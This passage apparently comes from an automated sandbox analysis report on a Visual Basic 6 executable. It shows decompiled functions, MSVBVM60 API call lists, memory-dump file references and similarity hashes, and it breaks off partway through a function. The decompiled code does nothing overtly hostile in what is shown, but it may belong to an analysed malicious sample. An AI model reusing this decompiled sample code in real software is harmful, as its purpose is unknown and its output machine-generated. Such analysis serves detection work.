0x0041aca7
0x0041acad
0x0041acb3
0x0041acb8
0x0041acb8
0x0041acca
0x0041acd0
0x0041acda
0x0041acdd
0x0041ace7
0x0041aceb
0x0041acef
0x0041acf0
0x0041acf5
0x0041acf6
0x0041acfe
0x0041ad06
0x0041ad0a
0x0041ad0e
0x0041ad0f
0x0041ad12
0x0041ad13
0x0041ad15
0x0041ad1a
0x0041ad1d
0x0041ad56
0x0041ad5b

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041AB37
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041AB4F
#610.MSVBVM60(?,?,?,?,?,00401426), ref: 0041AB58
#610.MSVBVM60(?,?,?,?,?,?,00401426), ref: 0041AB61
__vbaVarAdd.MSVBVM60(?,00000002,?,00000001,00000001), ref: 0041AB8D
#662.MSVBVM60(?,0040A2B8,?,00000000,?,00000002,?,00000001,00000001), ref: 0041ABA0
__vbaVarTstNe.MSVBVM60(00008002,?,?,0040A2B8,?,00000000,?,00000002,?,00000001,00000001), ref: 0041ABC4
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,0040A2B8,?,00000000,?,00000002,?,00000001,00000001), ref: 0041ABE2
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041AC36
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041AC6F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000048), ref: 0041ACB3
#595.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 0041ACF6
__vbaFreeObj.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 0041ACFE
__vbaFreeVarList.MSVBVM60(00000004,00000008,0000000A,0000000A,0000000A,00000008,00000000,0000000A,0000000A,0000000A), ref: 0041AD15
__vbaFreeVar.MSVBVM60(0041AD5C), ref: 0041AD56

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#610List$#595#662CheckChkstkHresultNew2
String ID:
API String ID: 2213932763-0
Opcode ID: 07d3c47d99ab14119a0347f59bdb5ee6505bd1b27c8461088c31d30d4759d740
Instruction ID: 281f4edd3d02fe28974dc1ce981f16dd27bf26eac8da4f5e771ef8e32328a321
Opcode Fuzzy Hash: 07d3c47d99ab14119a0347f59bdb5ee6505bd1b27c8461088c31d30d4759d740
Instruction Fuzzy Hash: EA51D6B2D01218ABDB10DB91CC45FDEB7BDAB08304F0081AAE115BB191DB799A458F65

Uniqueness

Uniqueness Score: -1.00%

Function 0041CDF7, Relevance: 22.6, APIs: 15, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041CDF7(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				char _v52;
				char _v60;
				char _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				short _v84;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _t64;
				signed int _t69;
				signed int _t73;
				char* _t76;
				char* _t77;
				intOrPtr _t93;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				_push(0x58);
				L00401420();
				_v12 = _t93;
				_v8 = 0x4013e0;
				L00401576();
				if( *0x41fb98 != 0) {
					_v92 = 0x41fb98;
				} else {
					_push(0x41fb98);
					_push(0x40a268);
					L004015B2();
					_v92 = 0x41fb98;
				}
				_v68 =  *_v92;
				_t64 =  *((intOrPtr*)( *_v68 + 0x14))(_v68,  &_v64);
				asm("fclex");
				_v72 = _t64;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40a258);
					_push(_v68);
					_push(_v72);
					L004015AC();
					_v96 = _t64;
				}
				_v76 = _v64;
				_t69 =  *((intOrPtr*)( *_v76 + 0x50))(_v76,  &_v60);
				asm("fclex");
				_v80 = _t69;
				if(_v80 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40a310);
					_push(_v76);
					_push(_v80);
					L004015AC();
					_v100 = _t69;
				}
				_push(_v60);
				_push(0);
				L0040154C();
				asm("sbb eax, eax");
				_v84 =  ~( ~_t69 + 1);
				L00401588();
				L004015A6();
				_t73 = _v84;
				if(_t73 != 0) {
					if( *0x41fb98 != 0) {
						_v104 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v104 = 0x41fb98;
					}
					_v68 =  *_v104;
					_t76 =  &_v52;
					L004014EC();
					_t77 =  &_v64;
					L004014F2();
					_t73 =  *((intOrPtr*)( *_v68 + 0x10))(_v68, _t77, _t77, _t76, _t76);
					asm("fclex");
					_v72 = _t73;
					if(_v72 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x40a258);
						_push(_v68);
						_push(_v72);
						L004015AC();
						_v108 = _t73;
					}
					L004015A6();
				}
				asm("wait");
				_push(0x41cfa3);
				L00401594();
				L00401594();
				return _t73;
			}

0x0041cdfc
0x0041ce07
0x0041ce08
0x0041ce0f
0x0041ce12
0x0041ce1a
0x0041ce1d
0x0041ce2a
0x0041ce36
0x0041ce50
0x0041ce38
0x0041ce38
0x0041ce3d
0x0041ce42
0x0041ce47
0x0041ce47
0x0041ce5c
0x0041ce6b
0x0041ce6e
0x0041ce70
0x0041ce77
0x0041ce90
0x0041ce79
0x0041ce79
0x0041ce7b
0x0041ce80
0x0041ce83
0x0041ce86
0x0041ce8b
0x0041ce8b
0x0041ce97
0x0041cea6
0x0041cea9
0x0041ceab
0x0041ceb2
0x0041cecb
0x0041ceb4
0x0041ceb4
0x0041ceb6
0x0041cebb
0x0041cebe
0x0041cec1
0x0041cec6
0x0041cec6
0x0041cecf
0x0041ced2
0x0041ced4
0x0041cedb
0x0041cee0
0x0041cee7
0x0041ceef
0x0041cef4
0x0041cefa
0x0041cf03
0x0041cf1d
0x0041cf05
0x0041cf05
0x0041cf0a
0x0041cf0f
0x0041cf14
0x0041cf14
0x0041cf29
0x0041cf2c
0x0041cf30
0x0041cf36
0x0041cf3a
0x0041cf48
0x0041cf4b
0x0041cf4d
0x0041cf54
0x0041cf6d
0x0041cf56
0x0041cf56
0x0041cf58
0x0041cf5d
0x0041cf60
0x0041cf63
0x0041cf68
0x0041cf68
0x0041cf74
0x0041cf74
0x0041cf79
0x0041cf7a
0x0041cf95
0x0041cf9d
0x0041cfa2

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041CE12
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041CE2A
__vbaNew2.MSVBVM60(0040A268,0041FB98,?,?,?,?,00401426), ref: 0041CE42
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,00000014), ref: 0041CE86
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A310,00000050), ref: 0041CEC1
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0041CED4
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0041CEE7
__vbaFreeObj.MSVBVM60(00000000,?), ref: 0041CEEF
__vbaNew2.MSVBVM60(0040A268,0041FB98,00000000,?), ref: 0041CF0F
__vbaObjVar.MSVBVM60(?,00000000,?), ref: 0041CF30
__vbaObjSetAddref.MSVBVM60(?,00000000,?,00000000,?), ref: 0041CF3A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,00000010), ref: 0041CF63
__vbaFreeObj.MSVBVM60 ref: 0041CF74
__vbaFreeVar.MSVBVM60(0041CFA3,00000000,?), ref: 0041CF95
__vbaFreeVar.MSVBVM60(0041CFA3,00000000,?), ref: 0041CF9D

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$AddrefChkstk
String ID:
API String ID: 3544364872-0
Opcode ID: 189f8bfe8a42aa1e0a28b6dd35b6bdf948aff23944282e155ba32a3a31237a46
Instruction ID: fb0094961745ea6903f750f3017a1e0108f0e9298459c487bd2e657c0dc85fd8
Opcode Fuzzy Hash: 189f8bfe8a42aa1e0a28b6dd35b6bdf948aff23944282e155ba32a3a31237a46
Instruction Fuzzy Hash: 2051D370D90318EFCB10EB95CC85BDDBBB5BF48705F50452AF006BA2A1D778A886DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1E3, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041D1E3(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _v28;
				void* _v32;
				intOrPtr _v40;
				char _v48;
				char _v64;
				intOrPtr _v88;
				intOrPtr _v96;
				char* _v104;
				char _v112;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr _v136;
				intOrPtr* _v140;
				signed int _v144;
				signed int _v148;
				short _t59;
				signed int _t62;
				signed int _t68;
				signed int _t74;
				intOrPtr _t87;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t87;
				L00401420();
				_v12 = _t87;
				_v8 = 0x401410;
				_v40 = 0xe;
				_v48 = 2;
				_push( &_v48);
				_push( &_v64);
				L004014D4();
				_v104 = L"Out of string space";
				_v112 = 0x8008;
				_push( &_v64);
				_t59 =  &_v112;
				_push(_t59);
				L0040155E();
				_v116 = _t59;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L0040159A();
				_t62 = _v116;
				if(_t62 != 0) {
					if( *0x41fb98 != 0) {
						_v140 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v140 = 0x41fb98;
					}
					_v116 =  *_v140;
					_t68 =  *((intOrPtr*)( *_v116 + 0x1c))(_v116,  &_v32);
					asm("fclex");
					_v120 = _t68;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40a258);
						_push(_v116);
						_push(_v120);
						L004015AC();
						_v144 = _t68;
					}
					_v124 = _v32;
					_v88 = 0x80020004;
					_v96 = 0xa;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t74 =  *((intOrPtr*)( *_v124 + 0x5c))(_v124, 0x10,  &_v28);
					asm("fclex");
					_v128 = _t74;
					if(_v128 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x40a288);
						_push(_v124);
						_push(_v128);
						L004015AC();
						_v148 = _t74;
					}
					_t62 = _v28;
					_v136 = _t62;
					_v28 = _v28 & 0x00000000;
					L0040156A();
					L004015A6();
				}
				_push(0x41d398);
				L00401588();
				return _t62;
			}

0x0041d1e8
0x0041d1f3
0x0041d1f4
0x0041d200
0x0041d208
0x0041d20b
0x0041d212
0x0041d219
0x0041d223
0x0041d227
0x0041d228
0x0041d22d
0x0041d234
0x0041d23e
0x0041d23f
0x0041d242
0x0041d243
0x0041d248
0x0041d24f
0x0041d253
0x0041d254
0x0041d256
0x0041d25e
0x0041d264
0x0041d271
0x0041d28e
0x0041d273
0x0041d273
0x0041d278
0x0041d27d
0x0041d282
0x0041d282
0x0041d2a0
0x0041d2af
0x0041d2b2
0x0041d2b4
0x0041d2bb
0x0041d2d7
0x0041d2bd
0x0041d2bd
0x0041d2bf
0x0041d2c4
0x0041d2c7
0x0041d2ca
0x0041d2cf
0x0041d2cf
0x0041d2e1
0x0041d2e4
0x0041d2eb
0x0041d2f9
0x0041d303
0x0041d304
0x0041d305
0x0041d306
0x0041d30f
0x0041d312
0x0041d314
0x0041d31b
0x0041d337
0x0041d31d
0x0041d31d
0x0041d31f
0x0041d324
0x0041d327
0x0041d32a
0x0041d32f
0x0041d32f
0x0041d33e
0x0041d341
0x0041d347
0x0041d354
0x0041d35c
0x0041d35c
0x0041d361
0x0041d392
0x0041d397

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041D200
#652.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00401426), ref: 0041D228
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041D243
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0041D256
__vbaNew2.MSVBVM60(0040A268,0041FB98), ref: 0041D27D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000001C), ref: 0041D2CA
__vbaChkstk.MSVBVM60(?), ref: 0041D2F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A288,0000005C), ref: 0041D32A
__vbaStrMove.MSVBVM60 ref: 0041D354
__vbaFreeObj.MSVBVM60 ref: 0041D35C
__vbaFreeStr.MSVBVM60(0041D398), ref: 0041D392

Strings

Out of string space, xrefs: 0041D22D

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#652ListMoveNew2
String ID: Out of string space
API String ID: 685055062-1418083887
Opcode ID: 103200ea9cb6cf046bfd7f16a1f118fbddd4a015437b06bd3dde410596f7d6b1
Instruction ID: 7db65744838af006a43073d05f95c6e528bdb920e263a4fe1c627a10c6452c39
Opcode Fuzzy Hash: 103200ea9cb6cf046bfd7f16a1f118fbddd4a015437b06bd3dde410596f7d6b1
Instruction Fuzzy Hash: 164139B1D00208EFDB10DFA1C845BDEB7B4BF08304F60816AE515BB2A2D7799985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3E5, Relevance: 19.6, APIs: 13, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041C3E5(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				short _v100;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				short _v140;
				intOrPtr _v144;
				signed int _v148;
				char* _t68;
				signed int _t72;
				char* _t76;
				signed int _t83;
				char* _t85;
				intOrPtr _t93;
				void* _t104;
				void* _t106;
				intOrPtr* _t107;
				intOrPtr _t113;

				_t113 = __fp0;
				_t107 = _t106 - 0xc;
				 *[fs:0x0] = _t107;
				L00401420();
				_v16 = _t107;
				_v12 = 0x401340;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x401426, _t104);
				L00401576();
				if( *0x41e010 != 0) {
					_v128 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v128 = 0x41e010;
				}
				_t68 =  &_v44;
				L004015B8();
				_v104 = _t68;
				_t72 =  *((intOrPtr*)( *_v104 + 0x140))(_v104,  &_v100, _t68,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x308))( *_v128));
				asm("fclex");
				_v108 = _t72;
				if(_v108 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x40a120);
					_push(_v104);
					_push(_v108);
					L004015AC();
					_v132 = _t72;
				}
				if( *0x41e010 != 0) {
					_v136 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v136 = 0x41e010;
				}
				_t93 =  *((intOrPtr*)( *_v136));
				_t76 =  &_v48;
				L004015B8();
				_v112 = _t76;
				_v88 = 0x80020004;
				_v96 = 0xa;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v140 = _v100;
				asm("fild dword [ebp-0x88]");
				_v144 = _t113;
				 *_t107 = _v144;
				_t83 =  *((intOrPtr*)( *_v112 + 0x1cc))(_v112, _t93, 0x10, 0x10, 0x10, _t76,  *((intOrPtr*)(_t93 + 0x304))( *_v136));
				asm("fclex");
				_v116 = _t83;
				if(_v116 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x40a0f4);
					_push(_v112);
					_push(_v116);
					L004015AC();
					_v148 = _t83;
				}
				_push( &_v48);
				_t85 =  &_v44;
				_push(_t85);
				_push(2);
				L004015A0();
				asm("wait");
				_push(0x41c5f7);
				L00401594();
				return _t85;
			}

0x0041c3e5
0x0041c3e8
0x0041c3f7
0x0041c401
0x0041c409
0x0041c40c
0x0041c413
0x0041c422
0x0041c42b
0x0041c437
0x0041c451
0x0041c439
0x0041c439
0x0041c43e
0x0041c443
0x0041c448
0x0041c448
0x0041c46c
0x0041c470
0x0041c475
0x0041c484
0x0041c48a
0x0041c48c
0x0041c493
0x0041c4af
0x0041c495
0x0041c495
0x0041c49a
0x0041c49f
0x0041c4a2
0x0041c4a5
0x0041c4aa
0x0041c4aa
0x0041c4ba
0x0041c4d7
0x0041c4bc
0x0041c4bc
0x0041c4c1
0x0041c4c6
0x0041c4cb
0x0041c4cb
0x0041c4f1
0x0041c4fb
0x0041c4ff
0x0041c504
0x0041c507
0x0041c50e
0x0041c515
0x0041c51c
0x0041c523
0x0041c52a
0x0041c534
0x0041c53e
0x0041c53f
0x0041c540
0x0041c541
0x0041c545
0x0041c54f
0x0041c550
0x0041c551
0x0041c552
0x0041c556
0x0041c560
0x0041c561
0x0041c562
0x0041c563
0x0041c568
0x0041c56e
0x0041c574
0x0041c581
0x0041c58c
0x0041c592
0x0041c594
0x0041c59b
0x0041c5ba
0x0041c59d
0x0041c59d
0x0041c5a2
0x0041c5a7
0x0041c5aa
0x0041c5ad
0x0041c5b2
0x0041c5b2
0x0041c5c4
0x0041c5c5
0x0041c5c8
0x0041c5c9
0x0041c5cb
0x0041c5d3
0x0041c5d4
0x0041c5f1
0x0041c5f6

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041C401
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041C42B
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041C443
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C470
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000140), ref: 0041C4A5
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041C4C6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C4FF
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041C534
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041C545
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041C556
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,000001CC,?,?,00000000), ref: 0041C5AD
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041C5CB
__vbaFreeVar.MSVBVM60(0041C5F7,?,?,00401426), ref: 0041C5F1

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$List
String ID:
API String ID: 1303183447-0
Opcode ID: 36ed6977818e773a75dcf31f374ab9623bf5947125d2c64f03fd7c5d78fbfcb5
Instruction ID: 651b11a8baa49469c95acd4d0521a4a041c70e22cc9cd1e612fd71329cc5f345
Opcode Fuzzy Hash: 36ed6977818e773a75dcf31f374ab9623bf5947125d2c64f03fd7c5d78fbfcb5
Instruction Fuzzy Hash: 02513770D40218EFDB10DFA1C885BDDBBB5BF09304F10846AE505BB2A1CBB99985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDB6, Relevance: 19.6, APIs: 13, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041BDB6(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v100;
				short _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				short _v140;
				char _v144;
				signed int _v148;
				char* _t61;
				signed int _t65;
				char* _t69;
				signed int _t76;
				char* _t78;
				intOrPtr _t87;
				intOrPtr _t100;
				char _t106;

				_t106 = __fp0;
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t100;
				L00401420();
				_v12 = _t100;
				_v8 = 0x4012d0;
				L00401576();
				if( *0x41e010 != 0) {
					_v128 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v128 = 0x41e010;
				}
				_t61 =  &_v48;
				L004015B8();
				_v108 = _t61;
				_t65 =  *((intOrPtr*)( *_v108 + 0xa0))(_v108,  &_v104, _t61,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x310))( *_v128));
				asm("fclex");
				_v112 = _t65;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40a120);
					_push(_v108);
					_push(_v112);
					L004015AC();
					_v132 = _t65;
				}
				if( *0x41e010 != 0) {
					_v136 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v136 = 0x41e010;
				}
				_t87 =  *((intOrPtr*)( *_v136));
				_t69 =  &_v52;
				L004015B8();
				_v116 = _t69;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v140 = _v104;
				asm("fild dword [ebp-0x88]");
				_v144 = _t106;
				_v68 = _v144;
				_t76 =  *((intOrPtr*)( *_v116 + 0x1b4))(_v116, _t87, 0x10, 0x10, 0x10, _t69,  *((intOrPtr*)(_t87 + 0x314))( *_v136));
				asm("fclex");
				_v120 = _t76;
				if(_v120 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x1b4);
					_push(0x40a120);
					_push(_v116);
					_push(_v120);
					L004015AC();
					_v148 = _t76;
				}
				_push( &_v52);
				_t78 =  &_v48;
				_push(_t78);
				_push(2);
				L004015A0();
				asm("wait");
				_push(0x41bfb7);
				L00401594();
				return _t78;
			}

0x0041bdb6
0x0041bdbb
0x0041bdc6
0x0041bdc7
0x0041bdd3
0x0041bddb
0x0041bdde
0x0041bdeb
0x0041bdf7
0x0041be11
0x0041bdf9
0x0041bdf9
0x0041bdfe
0x0041be03
0x0041be08
0x0041be08
0x0041be2c
0x0041be30
0x0041be35
0x0041be44
0x0041be4a
0x0041be4c
0x0041be53
0x0041be6f
0x0041be55
0x0041be55
0x0041be5a
0x0041be5f
0x0041be62
0x0041be65
0x0041be6a
0x0041be6a
0x0041be7a
0x0041be97
0x0041be7c
0x0041be7c
0x0041be81
0x0041be86
0x0041be8b
0x0041be8b
0x0041beb1
0x0041bebb
0x0041bebf
0x0041bec4
0x0041bec7
0x0041bece
0x0041bed5
0x0041bedc
0x0041bee3
0x0041beea
0x0041bef4
0x0041befe
0x0041beff
0x0041bf00
0x0041bf01
0x0041bf05
0x0041bf0f
0x0041bf10
0x0041bf11
0x0041bf12
0x0041bf16
0x0041bf20
0x0041bf21
0x0041bf22
0x0041bf23
0x0041bf28
0x0041bf2e
0x0041bf34
0x0041bf41
0x0041bf4c
0x0041bf52
0x0041bf54
0x0041bf5b
0x0041bf7a
0x0041bf5d
0x0041bf5d
0x0041bf62
0x0041bf67
0x0041bf6a
0x0041bf6d
0x0041bf72
0x0041bf72
0x0041bf84
0x0041bf85
0x0041bf88
0x0041bf89
0x0041bf8b
0x0041bf93
0x0041bf94
0x0041bfb1
0x0041bfb6

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041BDD3
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041BDEB
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041BE03
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BE30
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000000A0), ref: 0041BE65
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041BE86
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BEBF
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041BEF4
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041BF05
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041BF16
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000001B4,?,?,00000000), ref: 0041BF6D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041BF8B
__vbaFreeVar.MSVBVM60(0041BFB7), ref: 0041BFB1

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$List
String ID:
API String ID: 1303183447-0
Opcode ID: 86f79e499e7aa655c41126d94da3aa5f441e6b581bb995f97f79ebd7c43a3754
Instruction ID: a4a1b892a8eea407195ecda54dcf94b54e0199dddb8a458a0bc5abecdbf14616
Opcode Fuzzy Hash: 86f79e499e7aa655c41126d94da3aa5f441e6b581bb995f97f79ebd7c43a3754
Instruction Fuzzy Hash: 60512370900318EFCB10DFA1C845BDDBBB9FB09308F20456AE505BB2A1CBB969859F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A67A, Relevance: 19.6, APIs: 13, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A67A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v40;
				char _v44;
				char _v60;
				char _v76;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				char _v124;
				void* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				short _t64;
				char* _t67;
				signed int _t73;
				void* _t75;
				char* _t76;
				signed int _t79;
				void* _t89;
				void* _t91;
				intOrPtr _t92;

				_t92 = _t91 - 0xc;
				 *[fs:0x0] = _t92;
				L00401420();
				_v16 = _t92;
				_v12 = 0x4011b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t89);
				_v100 = 0x40a238;
				_v108 = 8;
				L00401576();
				_push( &_v60);
				_push( &_v76);
				L00401558();
				_v116 = 0x40a244;
				_v124 = 0x8008;
				_push( &_v76);
				_t64 =  &_v124;
				_push(_t64);
				L0040155E();
				_v128 = _t64;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L0040159A();
				_t67 = _v128;
				if(_t67 != 0) {
					if( *0x41fb98 != 0) {
						_v152 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
